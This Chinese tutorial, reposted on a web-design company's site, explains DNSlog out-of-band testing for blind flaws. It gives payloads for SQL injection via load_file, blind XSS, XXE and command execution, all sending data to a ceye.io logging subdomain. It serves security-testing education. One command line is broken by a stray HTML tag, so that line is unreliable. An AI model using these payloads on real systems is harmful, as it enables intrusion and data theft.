怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。
創(chuàng)新互聯(lián)主要從事成都做網(wǎng)站、網(wǎng)站設(shè)計(jì)、網(wǎng)頁(yè)設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)宜興,10多年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專業(yè),歡迎來(lái)電咨詢建站服務(wù):13518219792
在實(shí)際測(cè)試一些網(wǎng)站的安全性問(wèn)題的時(shí)候,有些測(cè)試命令執(zhí)行后是無(wú)回顯的,我們可以寫腳本來(lái)進(jìn)行盲注,但有些網(wǎng)站會(huì)封禁掉我們的ip地址,這樣我們可以通過(guò)設(shè)置ip代理池解決,但是遇到盲注往往效率很低,所以產(chǎn)生了DNSlog注入。
在使用dnslog之前我們需要先了解一下反引號(hào)符號(hào):
符號(hào):`
名稱:反引號(hào),上分隔符
位置:反引號(hào),這個(gè)字符一般在鍵盤的左上角,數(shù)字1的左邊,不要將其同單引號(hào)混淆
作用:反引號(hào)括起來(lái)的字符串被shell解釋為命令行,在執(zhí)行時(shí),shell首先執(zhí)行該命令行,并以它的標(biāo)準(zhǔn)輸出結(jié)果取代整個(gè)反引號(hào)(包括兩個(gè)反引號(hào))部分。
DNSlog回顯測(cè)試如下:
首先需要有一個(gè)可以配置的域名,比如:ceye.io,然后通過(guò)代理商設(shè)置域名 ceye.io 的 nameserver 為自己的服務(wù)器 A,然后再服務(wù)器 A 上配置好 DNS Server,這樣以來(lái)所有 ceye.io 及其子域名的查詢都會(huì)到 服務(wù)器 A 上,這時(shí)就能夠?qū)崟r(shí)地監(jiān)控域名查詢請(qǐng)求了,圖示如下。
DNS在解析的時(shí)候會(huì)留下日志,咱們這個(gè)就是讀取多級(jí)域名的解析日志,來(lái)獲取信息
簡(jiǎn)單來(lái)說(shuō)就是把信息放在高級(jí)域名中,傳遞到自己這,然后讀取日志,獲取信息。
這樣說(shuō)原理很抽象,下面通過(guò)實(shí)際例子看下。
http://ceye.io 這是一個(gè)免費(fèi)的記錄dnslog的平臺(tái),我們注冊(cè)后到控制面板會(huì)給你一個(gè)二級(jí)域名:xxx.ceye.io,當(dāng)我們把注入信息放到三級(jí)域名那里,后臺(tái)的日志會(huì)記錄下來(lái)。
0x01SQL盲注
就以sql盲注為例。深入理解下DNSlog注入過(guò)程:
通過(guò)DNSlog盲注需要用的load_file()函數(shù),所以一般得是root權(quán)限。show variables like '%secure%';查看load_file()可以讀取的磁盤。
1、當(dāng)secure_file_priv為空,就可以讀取磁盤的目錄。
2、當(dāng)secure_file_priv為G:\,就可以讀取G盤的文件。
3、當(dāng)secure_file_priv為null,load_file就不能加載文件。
通過(guò)設(shè)置my.ini來(lái)配置。secure_file_priv=""就是可以load_flie任意磁盤的文件。
在MySQL命令行執(zhí)行:select load_file('\\afanti.xxxx.ceye.io\aaa');其中afanti就是要注入的查詢語(yǔ)句
查看平臺(tái),dnsLog被記錄下來(lái)。
load_file()函數(shù)可以通過(guò)dns解析請(qǐng)求。
以sql-labs第五關(guān):
payload:' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)-- -+
執(zhí)行的sql語(yǔ)句:SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)
查看dnslog日志,發(fā)現(xiàn)security數(shù)據(jù)庫(kù)被查詢出來(lái):
0x02 XSS(無(wú)回顯)
通過(guò)盲打,讓觸發(fā)者瀏覽器訪問(wèn)預(yù)設(shè)至的鏈接地址,如果盲打成功,會(huì)在平臺(tái)上收到如下的鏈接訪問(wèn)記錄:
payload:><img src=http://xss.xxxx.ceye.io/aaa>讓src請(qǐng)求我們的dnslog平臺(tái)
0x03 ×××F(無(wú)回顯)
payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
0x04命令執(zhí)行(無(wú)回顯)
當(dāng) ping 一個(gè)域名時(shí)會(huì)對(duì)其進(jìn)行一個(gè)遞歸 DNS 查詢的過(guò)程,這個(gè)時(shí)候就能在后端獲取到 DNS 的查詢請(qǐng)求,當(dāng)命令真正被執(zhí)行且平臺(tái)收到回顯時(shí)就能說(shuō)明漏洞確實(shí)存在。
Linux
curl http://haha.xxx.ceye.io/`whoami<br/>ping
whoami`.xxxx.ceye.io
Windows
ping %USERNAME%.xxx.ceye.io
看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝您對(duì)創(chuàng)新互聯(lián)的支持。
當(dāng)前題目:怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
本文網(wǎng)址:http://muchs.cn/article46/pjjheg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、商城網(wǎng)站、做網(wǎng)站、軟件開(kāi)發(fā)、虛擬主機(jī)、手機(jī)網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)